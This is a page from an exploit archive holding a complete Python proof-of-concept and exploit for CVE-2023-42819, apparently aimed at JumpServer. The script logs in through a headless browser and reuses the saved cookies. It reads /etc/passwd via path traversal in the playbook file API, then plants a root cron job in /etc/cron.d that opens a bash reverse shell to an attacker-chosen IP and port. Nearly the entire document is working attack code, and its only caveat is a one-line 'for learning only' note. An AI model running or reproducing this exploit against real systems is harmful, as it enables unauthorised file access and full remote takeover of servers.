4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-42819.py PY
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import os
import random
import string
import sys
import time
from urllib.parse import urljoin

import colorlog
import httpx
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
import undetected_chromedriver as uc

# Proxy settings: empty means no proxy. When the --proxy option is given the
# script rebinds this to {'all://': <proxy url>}.
PROXIES = {}


def banner():
    """Print the ASCII-art title banner followed by the author, blog and usage note."""
    print('''

 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝ 
                                                                                                        
                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途                              
    ''')


def setup_color_logging():
    """Configure colored console logging and return the configured logger.

    The logger obtained from ``colorlog.getLogger()`` (no name given) is set
    to INFO and receives one stdout handler whose formatter colors each
    record according to its level.
    """
    # Color used for each log level
    level_colors = dict(
        DEBUG='cyan',
        INFO='green',
        WARNING='yellow',
        ERROR='red',
        CRITICAL='bold_red',
    )
    formatter = colorlog.ColoredFormatter(
        '%(asctime)s - %(log_color)s%(levelname)s - %(message)s',
        datefmt='%Y-%m-%d %H:%M:%S',
        reset=True,
        log_colors=level_colors,
    )

    # Console handler writing to stdout with the colored format
    stdout_handler = logging.StreamHandler(sys.stdout)
    stdout_handler.setFormatter(formatter)

    # Attach the handler to the logger and hand the logger back
    configured = colorlog.getLogger()
    configured.setLevel(logging.INFO)
    configured.addHandler(stdout_handler)
    return configured


# Module-wide logger object, configured once at import time
logger = setup_color_logging()


def create_driver():
    """Create and return a headless Chrome browser object.

    The browser is built with ``uc.Chrome`` from a fixed list of command-line
    flags. When the module-level ``PROXIES`` mapping is non-empty, its
    ``'all://'`` entry is passed to Chrome as ``--proxy-server``.
    """
    # Flags are applied in this order
    chrome_flags = (
        '--disable-gpu',
        '--no-sandbox',
        '--headless',
        '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
        '--ignore-certificate-errors',
        "--disable-logging",
        "--disable-dev-shm-usage",
        "--disable-plugins-discovery",
        '--no-first-run',
        '--no-service-autorun',
        '--no-default-browser-check',
    )

    chrome_options = uc.ChromeOptions()
    for flag in chrome_flags:
        chrome_options.add_argument(flag)

    if PROXIES:
        chrome_options.add_argument(f"--proxy-server={PROXIES['all://']}")

    # Path to the chromedriver binary, wrapped in the Service object
    # (the original note says this form is for selenium versions > 4.9)
    driver_service = Service(executable_path='chromedriver.exe')

    return uc.Chrome(service=driver_service, options=chrome_options)


def do_login(target: str, username: str, password: str):
    """Log in through the web login form and save the browser cookies to disk.

    Opens ``/core/auth/login/`` under ``target``, fills in the credentials,
    submits the form and writes the browser's cookies as JSON to
    ``cookies.json`` in the current working directory.

    Args:
        target: Base URL of the site to log in to.
        username: Account username typed into the form.
        password: Account password typed into the form.

    The browser is always shut down, even when a step raises.
    """
    browser = create_driver()
    try:
        # Open the login page and give it a moment to render
        url = urljoin(target, '/core/auth/login/')
        browser.get(url=url)
        time.sleep(2)

        # Locate the username / password inputs and the submit button
        username_input = browser.find_element(by=By.NAME, value='username')
        password_input = browser.find_element(by=By.ID, value='password')
        btn = browser.find_element(by=By.XPATH, value='//*[@id="login-form"]/div[5]/button')

        # Explicit wait until all three elements are displayed
        wait = WebDriverWait(browser, timeout=3)
        wait.until(lambda username_wait: username_input.is_displayed())
        wait.until(lambda password_wait: password_input.is_displayed())
        wait.until(lambda btn_wait: btn.is_displayed())

        # Clear the inputs, then type the credentials
        username_input.clear()
        password_input.clear()
        username_input.send_keys(username)
        password_input.send_keys(password)

        # Submit the form
        btn.click()

        # Let the login request finish before reading the cookies; reading
        # them right after the click can capture the pre-login session.
        time.sleep(3)

        # All cookies of the current page (a list of cookie dicts)
        cookies = browser.get_cookies()
        logger.critical('Getting Cookies')

        # Persist the cookies as JSON
        with open('cookies.json', "w") as f:
            f.write(json.dumps(cookies))
            logger.critical('Cookies Write')
    finally:
        # quit() ends the whole driver session; close() would only close the
        # current window, and nothing was released at all on an exception.
        browser.quit()

def generate_random_letters(length):
    """Return a string of ``length`` randomly chosen ASCII letters.

    Characters are drawn with replacement from the upper- and lowercase
    ASCII alphabet.
    """
    return ''.join(random.choices(string.ascii_letters, k=length))


def client_config():
    """Build an ``httpx.Client`` that reuses the cookies stored in cookies.json.

    The file is expected to hold a JSON list of cookie objects with ``name``
    and ``value`` keys. The ``jms_csrftoken`` cookie is also sent as the
    ``X-CSRFToken`` header; a ``KeyError`` is raised if that cookie is absent.

    Returns:
        The configured client (certificate verification off, redirects not
        followed, proxies taken from the module-level ``PROXIES``).
    """
    # Load the saved cookie list
    with open('cookies.json', "r") as cookie_file:
        saved_cookies = json.load(cookie_file)

    # Flatten the cookie list into a name -> value mapping
    cookies_dict = {}
    for item in saved_cookies:
        cookies_dict[item['name']] = item['value']

    # The X-CSRFToken header must accompany the requests; its value comes
    # from the jms_csrftoken cookie
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
        'X-CSRFToken': cookies_dict['jms_csrftoken'],
    }

    return httpx.Client(
        headers=headers,
        verify=False,
        follow_redirects=False,
        cookies=cookies_dict,
        proxies=PROXIES,
    )


def uid_verify(target: str, client):  # for the case where a PlayBook object already exists
    """Return the id of the first playbook listed by the playbooks API.

    Args:
        target: Base URL of the site.
        client: HTTP client used for the GET request.

    Returns:
        The ``id`` of the first entry in the response, or ``None`` when the
        request fails, the status is not 200, or the body contains no ``id``.
    """
    uid_url = urljoin(target, '/api/v1/ops/playbooks/')

    try:
        uid_resp = client.get(url=uid_url)
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)
        return None

    # Nothing usable in the response
    if uid_resp.status_code != httpx.codes.OK or 'id' not in uid_resp.text:
        logger.critical('Playbook UID is not exists')
        return None

    # Collect every id in the listing and hand back the first one
    ids = [entry['id'] for entry in json.loads(uid_resp.text)]
    logger.critical('Playbook API INFO: %s', uid_resp.text)
    logger.critical('Playbook UID: %s', ids)
    return ids[0]


def add_playbook(target: str, client):
    """Create a playbook with a random four-letter name via the playbooks API.

    Args:
        target: Base URL of the site.
        client: HTTP client used for the POST request.

    The outcome is only logged; nothing is returned.
    """
    playbook_url = urljoin(target, '/api/v1/ops/playbooks/')
    # Random name for the new playbook
    playbook_name = generate_random_letters(4)
    json_data = {
        'name': playbook_name,
    }
    try:
        add_resp = client.post(url=playbook_url, json=json_data)
        if add_resp.status_code == 201 and 'id' in add_resp.text:
            logger.critical('Successfully Added: %s', add_resp.text)
        elif add_resp.status_code == 400:
            logger.error('Fields must be Unique: %s', add_resp.text)
        else:
            # One placeholder per argument: with a single %s and two
            # arguments the record fails to format and the message is lost.
            logger.error('Unknown Error: %s %s', add_resp.headers, add_resp.text)
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)


def poc(target: str, uid: str, client):
    poc_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/?key=/etc/passwd')
    try:
        poc_resp = client.get(url=poc_url)
        if 'root' in poc_resp.text:
            logger.critical('Vulnerable : %s ', poc_resp.url)
            logger.critical('Output: %s', poc_resp.text)
            return True
        else:
            logger.critical('Not Vulnerable')
            return False
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)


def exp(target: str, uid: str, client, shell_ip: str, shell_port: str):
    # 创建计划任务
    exp_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/')
    # JSON
    json_data = {
        "key": "/etc/cron.d",  # 创建路径
        "is_directory": True,  # 创建文件夹
        "name": "/etc/cron.d",  # 指定创建文件夹的名称
    }

    # 随机计划任务文件名
    shell_name = generate_random_letters(4)
    # JSON
    shell_data = {
        "key": "/etc/cron.d",  # 创建文件的路径
        "is_directory": False,  # 不创建文件夹
        "name": shell_name,  # 创建文件的名称
        "content": f"* * * * * root bash -c \"bash -i >& /dev/tcp/{shell_ip}/{shell_port} 0>&1\"\n"
        # 创建文件的内容
    }

    try:
        # 创建 cron.d 目录
        exp_resp = client.post(url=exp_url, json=json_data)
        if exp_resp.status_code == httpx.codes.OK:
            logger.critical('Directory is Successfully Created: %s', exp_resp.text)
            # 创建反弹 Shell 计划任务
            shell_resp = client.post(url=exp_url, json=shell_data)
            if shell_resp.status_code == httpx.codes.OK:
                logger.critical('Reverse Shell is Successfully Set: %s', shell_resp.text)
            else:
                logger.critical('Reverse Shell Failed: %s', exp_resp.text)
        else:
            logger.critical('Directory Creation Failed: %s', exp_resp.text)
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)


def check_and_exploit(target: str, uid: str, client, shell_ip: str, shell_port: str):
    if poc(target, uid, client):
        exp(target, uid, client, shell_ip, shell_port)


def run(target: str, username: str, password: str, shell_ip: str, shell_port: str):
    # 判断 cookie 文件是否存在
    if not os.path.exists('cookies.json'):
        # 登录并获取 cookies 和 headers
        logger.warning('Cookie is not exists, DO LOGIN')
        do_login(target, username, password)

    # 获取 client
    client = client_config()
    # 如果存在 uid
    uid = uid_verify(target, client)
    if uid:
        check_and_exploit(target, uid, client, shell_ip, shell_port)
    else:
        # 如果不存在 uid,则执行添加动作
        add_playbook(target, client)
        uid = uid_verify(target, client)
        check_and_exploit(target, uid, client, shell_ip, shell_port)


if __name__ == '__main__':
    banner()

    parser = argparse.ArgumentParser(description='CVE-2023-42819 by C1ph3rX13.')
    parser.add_argument('-t', '--target', type=str, required=True, help='target url')
    parser.add_argument('-u', '--username', type=str, required=True, help='account username')
    parser.add_argument('-p', '--password', type=str, required=True, help='account password')
    parser.add_argument('--ip', type=str, required=True, help='shell ip')
    parser.add_argument('--port', type=str, required=True, help='shell port')
    parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port")

    args = parser.parse_args()
    if args.proxy:
        PROXIES = {'all://': f'{args.proxy}'}

    run(args.target, args.username, args.password, args.ip, args.port)